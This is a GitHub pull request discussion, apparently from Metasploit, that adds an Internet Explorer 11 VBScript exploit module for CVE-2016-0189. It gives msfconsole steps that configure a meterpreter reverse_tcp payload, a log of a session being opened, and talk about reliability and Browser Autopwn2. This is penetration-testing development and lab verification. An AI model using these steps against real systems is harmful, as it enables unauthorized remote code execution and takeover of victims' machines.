
Internet Explorer 11 VBScript memory corruption exploit #7172

Merged
merged 3 commits into from Aug 3, 2016

Conversation

wwebb-r7
Contributor

@wwebb-r7 wwebb-r7 commented Aug 1, 2016

This adds an exploit for CVE-2016-0189, a memory corruption vulnerability in Internet Explorer on Windows 10.

Testing notes:

  • Get a non-updated version of Windows 10 Enterprise such as en_windows_10_enterprise_n_x64_dvd_6852541.iso from MSDN. I prefer Enterprise as you can disable automatic updates via group policies.
  • _Take a snapshot_ just in case you don't disable automatic updates correctly :p
  • It's not 100% reliable. I'd guess about 90% or higher. If the exploit fails, make sure to terminate any running Internet Explorer instances and then delete everything in C:\Users\yourusername\AppData\Local\Temp\Low, then try again

Verification

  • Get a Windows 10 VM. Do not update it.
  • Start msfconsole
  • use exploit/windows/browser/ms16_051_vbscript
  • set srvhost your-ip
  • set srvport whatever
  • set uripath whatever_youd_like
  • set payload windows/x64/meterpreter/reverse_tcp
  • set lhost your-ip
  • set lport whatever
  • run
  • Browse to http://your-ip:srvport/uripath through IE 11 on your Windows 10 VM
  • _Verify that you get a session going._ If you don't, follow the testing notes above and try again.

@wchen-r7
Contributor

wchen-r7 commented Aug 3, 2016

Yup, not 100% but works for me:

msf exploit(ms16_051_vbscript) > [*] Using URL: http://192.168.146.1:8080/lEgSGQe2bnEV
[*] Server started.
[*] Received request: /lEgSGQe2bnEV
[*] Sending main page ..
[*] Received request: /lEgSGQe2bnEV
[*] Sending main page ..
[*] Received request: /lEgSGQe2bnEV/efoc2W.dll
[*] Sending stage two DLL ...
[*] Received request: /lEgSGQe2bnEV/iICXX7.dll
[*] Sending local server DLL ...
[*] Received request: /lEgSGQe2bnEV/UQY7t7.html
[*] Received request: /lEgSGQe2bnEV/p8lDkbmy
[*] Sending payload ...
[*] Sending stage (1189423 bytes) to 192.168.146.172
[*] Meterpreter session 2 opened (192.168.146.1:4444 -> 192.168.146.172:49773) at 2016-08-03 13:51:52 -0500

@wchen-r7
Contributor

wchen-r7 commented Aug 3, 2016

I think I will lower the rank to normal, because I have a very different experience with the module. Most of the time it doesn't give me a shell. But I will go ahead and land it, and then if you want you can come take a look :-)

@wchen-r7 wchen-r7 merged commit be4f55a into rapid7:master Aug 3, 2016
wchen-r7 added a commit that referenced this pull request Aug 3, 2016
@wchen-r7
Contributor

wchen-r7 commented Aug 3, 2016

Release Notes

Microsoft Internet Explorer CVE-2016-0189 Script Engine Memory Corruption - This module exploits a vulnerability in Microsoft Internet Explorer, which was originally spotted in the wild.

@jrazer
Contributor

jrazer commented Dec 30, 2016

Possible to use it with Browser AutoPwn 2?

@void-in
Contributor

void-in commented Dec 30, 2016

@jrazer Originally it was included in Browser Autopwn2, but due to the reliability issue it was taken out. Browser Autopwn2 only includes exploits which have a high chance of successful exploitation. In the original PR, the module contained:

'BrowserRequirements' =>
{
  :source             => /script|headers/i,
  :os_name            => OperatingSystems::Match::WINDOWS,
  :ua_name            => HttpClients::IE,
  :ua_ver             => '11.0'
},

This is required for a module to be considered for the BAP. However, when it was landed, the above section was removed by @wchen-r7.
